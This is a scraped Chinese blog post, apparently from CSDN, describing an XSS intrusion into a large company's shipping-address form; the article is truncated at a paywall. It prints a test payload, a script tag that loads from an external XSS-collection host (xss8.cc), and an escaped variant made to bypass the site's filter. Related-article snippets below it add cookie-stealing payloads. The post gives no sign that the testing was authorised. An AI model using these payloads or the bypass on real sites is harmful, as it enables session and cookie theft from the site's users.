【渗透实例】记录一次XSS渗透过程

最新推荐文章于 2024-05-06 09:49:33 发布
最新推荐文章于 2024-05-06 09:49:33 发布
阅读量2.3k 收藏 7
点赞数 2
分类专栏: 渗透实例 文章标签: XSS
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37683287/article/details/94591810
版权

0x01 找到存在XSS的位置

没什么技巧,见到框就X,功夫不负有心人,在目标网站编辑收货地址处发现了存在XSS的地方,没想到这种大公司还会存在XSS。

使用的XSS代码:<img src=1 onerror=alert(1)
#因为CSDN编辑器的原因,这里括号不能补全,使用该XSS的时候alert(1)后要加上右括号以补全前面的左括号。

在这里插入图片描述

0x02 构造XSS代码连接到XSS平台

XSS平台给我们的XSS代码是这样的:

</tExtArEa>'"><sCRiPt sRC=https://xss8.cc/3Ri4></sCrIpT>

在这里插入图片描述
直接插入的话会提示参数非法,经过多次尝试,最后发现该平台会对双引号、script字符进行识别过滤,大小写会被过滤,于是尝试插入下面的语句:

</tExtArEa>'\"><\sCRiPt sRC=https://xss8.cc/3Ri4></\sCrIpT>

这条代码比上面平台给的XSS代码的多了几个 “\”,也就是转义字

最低0.47元/天 解锁文章
TeamsSix
关注
  • 2
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
白帽子之web漏洞--xss攻击
鼓浪屿岛与海的博客
12-04 473
本文仅供学习,不支持一切以不法利益为目的的商业攻击 一.xss攻击原理 xss 是“跨站脚本攻击”,是一种注入攻击,当web应用对用户输入过滤的不严格时,攻击者写入恶意的脚本(CSS,HTML,JavaScript)到网页中时,如果访问了含有恶意代码的页面,恶意脚本就会被浏览器解析执行导致用户被攻击 二.常见xss危害 cookie窃取,session劫持,钓鱼攻击,蠕虫,ddos等。 ...
BugKu Web WriteUp
AlexYoung28的博客
08-24 2200
Web 8 这道题的代码和前面的文件包含写的思路一样, 我们都是运用  php://input 写,来实现我们从文件中读出的数据和我们传入的数据一样。 我写的如下:  只要保证  $ac  的值 和我们写入文件  $fn 的值 一样即可, 我这里都写的是 123 细心 这道题刚开始看到主页之后,又看了源代码和抓了包,发现都没有什么特别的地方,所以,只有拿御剑扫描一下后台。 ...
02-XSS渗透测试步骤
最新发布
tianxiadiiw的博客
05-06 464
存储型又叫永久性xss,常见于留言板,因为存储型xss的页面会将用户输入的内容存入到数据库内,反射型xss一次性的,而且比较容易被发现,通常恶意链接会被修改成短链接,或钓鱼图片的形式。输入后和原有的前端代码产生混淆,形成新的页面语句,并且新的页面语句能够被浏览器解析并输出。所以其他人每访问一次的时候,服务器都会从数据库将攻击者输入的内容调取到前端浏览器解析,xss原理就是开发者没有对输入内容进行过滤,导致通过攻击者进行构造的前端代码,3)查看输出位置的内容与输入内容之间的关系,构建闭合和拼接脚本。
xss-labs 通关笔记
Ewige的博客
06-30 471
靶场地址:传送门 概述: XSS(跨站脚本)概述 Cross-Site Scripting 简称为“CSS”,为避免与前端叠成样式表的缩写"CSS"冲突,故又称XSS。一般XSS可以分为如下几种常见类型: 1.反射性XSS; 反射型XXS是一种非持久性的攻击,它指的是恶意攻击者往Web页面里插入恶意代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意攻击用户的目的。这里插入的恶意代码并没有保存在目标网站,需要引诱用户点击一个链接到目标网站的恶意链接来实施攻击。 原文链接:ht
Web渗透测试XSS攻击:初识XSS
vodkaDL的博客
12-16 398
文章目录前言什么是XSS产生XSS攻击漏洞的原因XSS的类型反射型XSS存储型XSS基于DOM的XSSXSS攻击漏洞的危害冒充受害用户上传木马文件总结 前言   本篇将围绕XSS展开,着重介绍什么是XSSXSS攻击漏洞产生的原因以及XSS的类型,最后简述XSS攻击漏洞造成的危害。 什么是XSS   所谓的XSS英文名为Cross-site scripting,翻译过来是跨站点脚本,缩写本应该是CSS,奈何“生不逢时”。由于此CSS容易与前端的CSS冲突,于是只得改为XSS。由跨站点脚本这个中文名也能看出来
XSS跨站脚本攻击漏洞
weixin_43211186的博客
01-10 3066
XSS跨站脚本攻击漏洞 文章目录XSS跨站脚本攻击漏洞0x01 XSS 背景0x02 XSS 概论利用XSS漏洞XSS攻击的类型反射型XSS:存储型XSS:DOM型XSS:0x03 最常见的cookies类型a.Session Cookieb.Persistent Cookiec.Secure cookied.HttpOnly Cookiee.3rd-party cookief.Super Cookie0x04常见标签0x05 检测XSS的办法内容安全策略(CSP)输入文本验证库或框架XSSer 0x01
XSS三重URL编码绕过实例.pdf
04-22
价值5999,vip免费阅读,可用于实战拟态,渗透测试学习,资源复现,红蓝对抗,攻防打点,漏洞复现,技术考证、权限维持,应急响应,Hvv实战
XSS检测防范技术与实例研究.pdf
09-11
XSS(跨站脚本攻击)检测防范技术与实例研究】 XSS(Cross Site Scripting)是一种常见的网络安全漏洞,允许攻击者通过注入恶意脚本到网页中,从而影响用户浏览器的行为。这种攻击通常发生在网站未能正确处理用户...
第04篇:XSS三重URL编码绕过实例1
08-03
这表明服务器端可能在接收参数后,不仅解码了一次URL,还将其直接输出到HTML中。 攻击者抓住了这个逻辑错误,通过进行三重URL编码(%252522),成功绕过了服务器的防御,使得双引号被正确解析并闭合了HTML标签,...
基于Java的实例源码-zaproxy(Web渗透测试 Zed Attack Proxy).zip
06-28
标题"基于Java的实例源码-zaproxy(Web渗透测试 Zed Attack Proxy).zip"指的是一个使用Java编程语言开发的开源项目Zap(Zed Attack Proxy)的源代码。Zap是一个广泛使用的Web应用安全扫描工具,主要用于进行Web渗透...
WEB代码审计和渗透测试讲义.ppt
12-18
* 变量的传递和二次漏洞:变量的传递和存储是一个复杂的立体过程,中间函数处理的过程诞生新的变量,新的变量达到新的漏洞函数。 五、二次漏洞 * 二次漏洞的概念:通过一个现有漏洞,创造新的漏洞使得漏洞利用最大...
XSS攻击
qq_56486005的博客
10-05 3837
一、Cross Site Scripting 原理: 攻击者向Web页面里插入恶意Script代码,当用户浏览该页面时,,嵌入到Script的代码被执行,达到恶意攻击的目的。 分类: 1.发送连接。 2.用户点击恶意连接。 3.网站将XSS同正常的网页返回到用户的浏览器。 4.用户的浏览器解析了网页中的恶意代码,向恶意服务器发起请求。 5.黑客从自己搭建的恶意服务器获取用户的相关信息。 需要欺骗用户自己去点击恶意连接才能触发XSS代码。大多时用来盗用cookie的。非持久化。 1.黑客在目标服务器上构造
渗透学习-XSS-基础知识部分(持续更新中)
qq_43696276的博客
09-18 553
跨站脚本攻击(XSS)是客户端脚本安全中的头号大敌。OWASP TOP 10威胁多次吧XSS列在榜首。本文将接下来具体的探讨XSS攻击的原理,以及如何正确的防御它。提示:这里对文章进行总结:例如:以上就是今天要讲的内容,本文仅仅简单介绍了pandas的使用,而pandas提供了大量能使我们快速便捷地处理数据的函数和方法。
xss绕过
weixin_51692662的博客
08-19 2600
xss绕过
xss跳转代码_记一次渗透测试XSS到Getshell过程(详细到无语)
weixin_39671631的博客
11-22 922
0X00前言前段时间有幸和大佬们参加了一次一周的攻防演练,让我这个菜鸡体验到了红队的感觉。所以打算记录一下其中一个花了三天由xss存储到后台的踩坑过程,希望大佬们多带带。0X01钓鱼到了攻防演练的第二天,早上有个同事和我说这边的一个目标存在存储xss,已经打回了cookie,但是对方开启了http-only无法利用,让我帮忙看看能不能进行钓鱼或者什么的。于是我打开这个站看...
使用kali进行渗透测试--攻击实例:Windows 2008
lxy123_com的博客
02-04 5112
实验环境:Kali虚拟机一台、4G运行,Windows 2008靶机一台,IP地址192.168.22.138 实验目的:使用kali对Windows 2008进行渗透测试 实验步骤: (一),对靶机进行扫描 1,使用Neuss进行扫描 2,开启metasploit框架进行扫描 msf6 > db_nmap -A -T4 192.168.22.138 使用nmap进行扫描 (二),进行渗透测试 扫描smb版本信息 msf6 > search s
XSS教程
hcl1687的专栏
08-14 7790
引言 本文译至《Excess Xss: A comprehensive tutorial on cross-site scripting》,由于译者水平有限,翻译不当之处,敬请批评指正。 一、概览   1、什么是XSS 跨站脚本(XSS)是代码注入攻击的一种。通过这种方式,攻击者可以在其他用户的浏览器中执行恶意的JavaScript代码。 攻击者并不直接锁定受害者,而是利用受害者经常访
一次完整的渗透测试(文末有福利)
m0_63715896的博客
12-27 2589
我们学习安全时,常常会一直停留在某一方面,甚至不知道自己接下来要学什么,而提前了解我们整个渗透需要掌握的技术显得至关重要,这样我们在平时的学习中就会更加注重需要掌握的知识,接下来将通过一个完整的渗透过程来讲解我们需要掌握的知识。 环境图片信息收集使用netdiscover探测存活主机图片图片使用nmap扫描存活主机和开放端口图片使用wfuzz扫描子域名图片信息收集的知识点甚多,远远不止这么一点,这只是冰山一角信息收集可以说是渗透过程中最关键的一步,对目标充分的了解,有利于我们对目标进行全面的分析,后续的思路
xss payload
07-15 383
'><script>alert(document.cookie)</script>='><script>alert(document.cookie)</script><script>alert(document.cookie)</script><script>alert(vulnerab...
"Web安全服务渗透测试报告模板与实例说明
Web安全服务渗透测试报告是对一个门户网站进行渗透测试后的全面分析报告,旨在评估该网站的安全性能并提供相应的改进建议。本报告使用了模板.docx,并按照通用的渗透测试报告结构进行撰写。 摘要部分对整个报告进行...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值